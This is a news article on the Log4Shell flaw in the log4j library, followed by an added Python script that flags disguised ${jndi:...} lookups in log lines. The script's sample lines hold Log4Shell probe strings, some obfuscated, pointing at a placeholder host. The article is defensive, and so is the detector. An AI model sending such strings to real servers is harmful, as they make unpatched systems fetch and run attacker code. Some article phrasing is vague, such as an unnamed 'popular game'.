‘Extremely bad’ vulnerability found in widely used logging system

The image is by Alex Castro.

A previously unknown vulnerability called Log4Shell has the potential to let hackers compromise millions of devices across the internet, and security teams at companies large and small are scrambling to patch it.

If exploited, the vulnerability allows remote code execution on a vulnerable server, giving an attacker the ability to load malicious software that compromises the machine.

Log4j is an open-source logging library used by apps and services across the internet. Logging is the process by which applications keep a running record of the activities they have performed, which can be reviewed in case of error. Log4j is a popular library because nearly every network security system runs a logging process.

There are only two other exploits that have the same severity over the last 10 years.

Millions of applications would be affected, according to Marcus Hutchins, a prominent security researcher best known for stopping the global WannaCry malware attack. Hutchins said that Log4j is used by millions of applications and that the attacker only needs to get the app to log a special string.

The vulnerability was first discovered on sites that host servers for the popular game. GreyNoise reported that it had detected numerous hosts searching the internet for machines vulnerable to the exploit.

A post on the LunaSec website claimed that Apple's iCloud and the gaming platform Steam were vulnerable. Neither Apple nor Valve responded to a request for comment.

To exploit the vulnerability, an attacker needs to cause the application to log a special string of characters. The vulnerability is easy to exploit and can be triggered in a variety of ways because applications log such a wide range of events.

John Graham-Cumming, the CTO of Cloudflare, told The Verge that this is a very serious vulnerability because of the widespread use of Java: there is a lot of Java software connected to the internet. He said only two other exploits in the last 10 years have had the same severity, Heartbleed and Shellshock, which allowed you to run code on a remote machine.

The diversity of applications vulnerable to the exploit and the range of delivery mechanisms mean that there is still risk. The exploit could even be delivered physically, by hiding the attack string in a QR code that is scanned by a package delivery company, making its way into the system without ever having been sent directly over the internet.

An update to the log4j library has been released to mitigate the vulnerability, but given the time it will take to ensure that all vulnerable machines are updated, Log4Shell remains a pressing threat.
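Until every vulnerable machine is updated, defenders will want to know whether the special string described above has already been logged. The script below is an added example, not from the article or the log4j project; it assumes, from the public advisory rather than from this article, that the string is a log4j `${jndi:...}` lookup, and it unwraps the `${lower:...}`, `${upper:...}` and `:-` default-value tricks used to disguise that keyword before checking each line. The log lines are constructed samples.

```python
import re

# Innermost log4j-style lookup: ${name} or ${name:argument}, with no nested ${ } inside.
_INNER_LOOKUP = re.compile(r"\$\{([^${}:]*)(?::([^${}]*))?\}")

def _resolve_inner(match):
    """Reduce one innermost lookup the way log4j's string substitution would,
    for the handful of lookups used to disguise the 'jndi' keyword."""
    name, arg = match.group(1).lower(), match.group(2)
    if arg is None:
        return match.group(0)          # ${foo}: nothing to simplify
    if name == "lower":
        return arg.lower()             # ${lower:J} -> j
    if name == "upper":
        return arg.upper()             # ${upper:j} -> J
    if ":-" in arg:
        return arg.split(":-", 1)[1]   # ${env:UNSET:-j} or ${::-j} -> default value j
    return match.group(0)              # ${jndi:...} and unknown lookups stay as they are

def normalise_lookups(text, max_rounds=10):
    """Repeatedly collapse innermost lookups until the string stops changing."""
    for _ in range(max_rounds):
        reduced = _INNER_LOOKUP.sub(_resolve_inner, text)
        if reduced == text:
            break
        text = reduced
    return text

_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def is_log4shell_probe(line):
    """True if the line contains a ${jndi:...} lookup, plainly or disguised."""
    return bool(_JNDI.search(normalise_lookups(line)))

def scan(lines):
    """Return the 1-based numbers of the lines that carry a probe string."""
    return [n for n, line in enumerate(lines, 1) if is_log4shell_probe(line)]

# Constructed sample log lines (not real traffic); example.invalid is a reserved placeholder host.
SAMPLE_LINES = [
    'GET /index.html 200 "Mozilla/5.0"',
    'GET / 200 "${jndi:ldap://example.invalid/a}"',
    'GET / 200 "${${lower:j}${upper:n}di:ldap://example.invalid/a}"',
    'GET / 200 "${${env:NOT_SET:-j}${::-n}di:rmi://example.invalid/b}"',
    'order total=${total:-0} shipped',
]

if __name__ == "__main__":
    print("suspicious lines:", scan(SAMPLE_LINES))   # [2, 3, 4]
```

A hit means the string reached the logger; whether it was executed depends on the log4j version in use, so matching lines are a trigger for a patch check, not proof of compromise.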